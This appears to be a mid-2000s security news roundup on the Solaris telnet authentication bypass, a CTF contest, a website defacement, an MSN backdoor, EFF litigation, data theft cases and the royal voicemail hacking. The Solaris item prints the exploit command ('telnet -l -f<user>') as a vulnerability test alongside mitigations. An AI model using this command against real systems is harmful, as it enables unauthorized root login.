What
appears to be an old security issue, has come to bite Sun's
flagship Solaris OS in the "root", so to speak. A bug in Solaris SunOS
5.10/5.11 "in.telnet" configuration allows attackers to log into the
service WITH NO PASSWORD. This is
basically the same
"AIX/linux rlogin -froot" bug that affected BSD tools distributed with
many *nix systems as long as 10 years ago! Solaris 9 and below appear
to not be vulnerable.
Announced on the Full Disclosure mailing list, security researcher
"Kingcope" released a paper that brought the flaw to
light.
According to CERT, "By supplying
a specially crafted USER
Environment variable over telnet, a remote attacker may be able to
bypass authentication to gain access to the system with elevated
privileges. Public exploit code is available". They correctly note that
the attacker must know the name of a valid user on the system, but
falsely state that it cannot be used to gain root access.
However, when "in.telnetd" is
configured to allow non-console superuser login, this
flaw can give root access.
To test if you are vulnerable, simply try
to telnet to your Solaris box with this command:
"telnet -l
-f<user> <hostname>"
Security
experts are suggesting a few different mitigation
techniques to protect systems from this flaw, as there is no patch
currently available from Sun.
-
firewall access tp port 23
- disable the "telnetd" service
- disable "in.telnetd" in the
"/etc/inetd.conf" file
- change "/etc/default/login add
CONSOLE=/dev/console" to limit where root can login from.
Sun has responded to this discovery, you may read
their response here.
The disclosure of this
vulnerability to the public without
vendor notification, or a patch, keeps the fires burning on the
question of the "Full Disclosure" style of alerting the world to
security flaws.
Hack In The Box announced a
Capture the Flag ('CTF') hacking competition with cash prizes that
will take place in Sheraton Creek Hotel, Dubaifrom 4th - 5th April 2007 .
This is the second CTF to be held in the Middle East after
HITBSecConf2005, which was run in
Bahrain.
This
CTF game is an attack only version of the popular competition held once
a year in Kuala Lumpur: several teams of three players will challenge
each others in launching penetrative attacks
against pre-configured servers and target
machines.
According to
the official website ,
“Each
machine is configured with various services (some of which may be
vulnerable while others might not be). Participants are required to
retrieve pre-configured files or ‘flags’ from the
target machine in
order to score points. Attendees are not bared from attacking each
other however any participant found using denial of service attacks
will be removed from the game immediately.”
These
servers reproduce a digital environment which is as close as
possible
to the real one but each application contains both known
vulnerabilities and specifically designed breaches.
Players
are allowed to use any kind of technique to hit the target and get as
many flags as possible, but hard limitations are imposed to the
participants in order to prevent them from subverting each
others: no
flooding of network, no DOS attacks are admitted and , as highlighted
in the official website :
“ NO
harassment of other opponents (verbal abuse, etc), NO
physical
attack, NO attacking of Score Servers” will be
tolerated.
The
team that during the two day-race will collect the highest
number of
flags, will be the winner and get the prize amounting to $3000.,
whereas $2000 will go to the second place and $1000 to the third place.
The
main objective of the CTF competition is to create an occasion for
experts in hacking techniques to show their abilities and the legal
application of such skills. Moreover, as declared by Meling
Mudin,
lead organiser of the CTF competition and a core member of the HITB
team :” it allows information security practitioners the
opportunity to
showcase their security research capabilities and skills to the rest of
the world."
'This
is evident by the number of serious independent security consultants,
security research and development companies, and security consulting
companies which routinely send their best guys to participate in the
Malaysian competition', he added.
The race will take place during
HITBSecConf2007, that will start in April, 2nd.
Canadian
Nuclear Safety Commission's website attacked
The
Canadian Nuclear Safety Commission's website
was hacked last week by an unknown attacker who replaced the
official
"Media Releases" section with a section named
"security breaches" and
there he (or she) posted a photograph of a nuclear explosion.
The picture was labeled as "for Immediate
Release" and it was associated to the caption: "Please dont [sic]
put me in jail … oops, I divided by zero."
The attack provoked astonishment and concern
across Canada, because the Canadian Nuclear
Safety Commission IT System holds details and sensitive
information
about nuclear activities in Canada and about how to track the
movement
of high-risk radioactive sealed sources.
According
to Aurèle Gervais, the spokesman of the Commission, the
attack will not
bring about dangers for National Security since there’s no
way anyone
could get the access to “potentially dangerous
information” without a
secure government login. Moreover Mr. Gervais confirmed the attack was
carried out on a part of the website run by an external provider with
no link to the internal site.
In
spite of the fact that an information leak is very unlikely to happen,
the Commission is going to undertake deep investigations and it has
already asked the Royal
Canadian Mounted Police , the national police service, to investigate.
This
is the first time such an attack has been held against the Canadian Nuclear Safety
Commission, but considering the variety of vulnerabilities discovered
every day ,it will be hardly the last one.
MSN-addicted
pay attention! The Taipei Times reported
that thousands of people across Taiwan have been affected by
a virus
transmitted through MSN that allows attackers to take control
of
users’ PCs.
Lots of them have received
a link from friends regularly registered in their list of contacts.
Once they clicked over it, they discovered a backdoor virus has been
installed on their computers.
Many users declared that as first their
list of contacts
disappeared and it became impossible to close MSN Messenger. Some of
them said that data was wiped off their computers, while
others
admitted that nothing untoward after clicking on the Messenger link.
There
are is no clear information about the nature of the virus or about how
widespread was, indeed on the one hand MSN representatives
claimed
that they detected a backdoor virus named BKDR_RINBOT.A, and on the
other experts from the Chinese division of Symantec
said that it
could be identified as the Backdoor.irc.Bot virus.
According
to Symatec, the virus uses the contact list to send the link so that
the recipient will be taken off guard.
The
purpose of this kind of attack is both to obtain more contacts to
continue to spread the virus, and to gain full control of the infected
computer. Moreover, it was verified that infected computers would
execute the virus every time the computer was rebooted and tried to
connect to an IRC chat room server so that computers connecting to that
server would become infected by the virus.
US
Army declared war
against military data leaks but its security program hasn’t
met with
enthusiasms by privacy groups that harshly criticized the
initiative
to monitor and eventually censor websites and soldiers' blogs
.
According to the Register
, the Electronic Frontier Foundation (EFF) sued the US
Department of
Defense after the Department of Defense and Army failed to respond to Freedom
of Information Act (FOIA) requests about the blog monitoring
programme.
All
federal agencies, including the Department of Defense and the Army are
required to keep to the Freedom of Information Act (FOIA) that burdens
institutions to disclose records requested in writing by any person.The
EFF focuses on the fact that an
Army unit called the Army Web Risk Assessment Cell (AWRAC) has the
charge to notify webmasters and bloggers when it finds "sensitive
information".
Anyway bloggers sometimes complaint that
they are often
coerced to censor also those passages that have nothing to do with
military information but actually deal with their personal feelings
about war.
"Soldiers should be free to blog their
thoughts at this critical point in the national debate on the war in
Iraq," EFF staff attorney Marcia Hofmann said. "Of course, a military
effort requires some level of secrecy. But the public has a right to
know if the Army is silencing soldiers' opinions as well. That's why
the Department of Defense must release information on how this program
works without delay."
On the other hand, an Army
statement highlights that : "AWRAC notifies webmasters and blog writers
when they find documents, pictures, and other items that may compromise
security. AWRAC reviews for information on public websites which may
provide an adversary with sensitive information that could put soldiers
or family members in danger. AWRAC assesses the risk the information
poses to the military and determines if the next step is to request the
information be removed."
In spite of the fact that
the AWRAC has no legal authority to impose changes to postings or to
take down a certain website, no member of the US Army would dare make a
stand. Indeed, the Unit has much influence since just the fact that a
soldier's superiors get informed about similar facts, could represent a
concern for the soldier himself.
This initiative to
support soldiers' right of expression is a part of
the EFF’s FLAG
Project, which uses FOIA requests
and litigation to cast a light on government'sAbuses
about privacy.
Last
week a former Morgan
Stanley consultant
was found guilty in a case of data stealing: Ira Chilowitz, 44 has been
accused of stealing names of the brokerage firm's hedge fund clients
and confidential information about the fees they were charged, Reuters reported .
The
defendant declared that his decision to get proprietary
documents from
his company’s database was due to the fact that he and
another
individual were planning to set up their own consulting firm and they
thought that such classified information could help them get business.
No comment was released by Morgan
Stanley's spokesmen on this proposal.
According
to official documents by the Attorney, the data on the company's hedge
fund clientele "would be highly valuable to competitors of Morgan."
This
is the main reason standing behind the accusations of conspiracy, theft
of trade secrets, unauthorized computer access and transportation of
stolen property, moved to Mr. Chilowitz .
Mr Chilowitz was arrested in july and now
he risks 26 years in prison and an $850,000 fine.
Criminal
hunting methods are changing more and more according
to the development of new technologies and instruments but
recently, a
strange trend is revolutionizing criminal investigation
techniques..
The
trend consists in making pleas about cases of murders,
kidnappings,
burglaries and other crimes on social networks such ad MySpace in order
to hit the attention of the widest range of people and possibly collect
information to help investigations. In other words, these pleas work as
high-tech equivalents of "wanted" posters.
Similar
initiatives are taken by crime victims
and police equally , showing a further perspective about the
level of
influence that the Internet has in everyday life.
For
instance, relatives of a Chicago doctor who was murdered last
October,
posted on MySpace.com a surveillance video showing a blood-spattered
young man rushing from the building.
The
son of the victim explain this choice as an attempt to gain attention
on the case: "Young people between 18 and 25 are probably not
watching
the nightly news or reading the newspaper every day. That audience is
probably on the Internet, and they all have MySpace."
After
they posted on MySpace an announcement offering a $25,000 reward, the
website received more than 40,000 hits in six weeks, whereas Chicago
Police admitted they hadn’t received any call but just a few
e-mails.
Social
networks has been monitored for long by police agencies that were in
search for sexual predators of terrorist organizations, and now they
are actively using them as a crime-fighting tool:as
reported by the US magazine USA Today, a detective said that
he gets "probably one, two MySpace cases a week."
Is
money made by data thieves a source for terrorism?
The
link between cyber crime and terrorism is quite foggy and it is not
easy to determine which activities are backed by terrorist
organizations and which ones are carried out by
“normal” attackers.
Anyway, as declared by Miss Avivah Litan, Gartner's resident expert
on
identity theft, recent events have cleared up the situation a bit more.
"This is something
people have been talking about since 9-11,"she says. "But
it's really a new phenomenon."
The first effective proof of cracking
activities aimed to
Middle East extremist group's fund-raising was discovered in late 2006
thanks to the arrest of approximately 50 people in Egypt and Lebanon.
The arrests led to the discovery of millions of dollars
filched by
using stolen debit and credit account numbers.
Miss
Litan’s declaration was released after last week’s
attack to the
company of chain retailers T.J. Maxx and Marshalls that provoked a huge data breach.
There’s
no confirmation about the involvement of terrorism in such attack but
security experts do not hide their concern about this possibility.
Specifically,
Miss Litan's assertions focus on the debate about what is really
happening on the digital ground: nothing new... but very little known!
People go
hacking (and cracking) for the strangest reasons but.. wow! Now
there’s also someone who hacks for gossip!
This
could have been the beginning of an unconventional story about stolen
secrets for frivolous reasons but even if the underground world is such
a small world, there are no crunchy implications in this story and
in
spite of appearances, this digital intrusion, was committed for
money.
According
to the Associated Press, a British tabloid journalist who hacked into
royal officials' voicemail was sentenced Friday to four months in
prison.
Clive
Goodman, 49, the royal editor of the News of the World, was probably
looking for a career-saving scoop, so he hired a
private
investigator, Mr.Glenn Mulcaire, to hack into royal officials'
voicemail systems and intercept messages from the
members of the
British royal family.
Mr. Goodman’s lawyer claimed that
“Mr. Goodman's stories were no longer considered adequate by
his superiors.”
“He
was demoted, sidelined and a younger reporter was assigned to cover the
royal family. Under that pressure, he feared for his job, “he
said.
Unfortunately
for Mr. Goodman the judge didn’t consider “working
pressure” as a
reasonable excuse to get uncontrolled access into Royal
family’s life
and he and Mr. Mulcaire where condemned to four and six
months in
prison.
Soon after the
sentences Andy Coulson, the editor of the News of the World, resigned.
As
admitted by Mr. mulcaire, managed in getting mobile phone
network
operators ‘s confidential pin numbers to access messages left
on the
Royal cell phones . So, between November 2005 and June 2006, he and
Goodman and made 609 separate calls to the voicemail systems
of three
senior members of the royal household.
Their lack of experience was the cause of a
series of digital mistakes that allowed police to arrest them.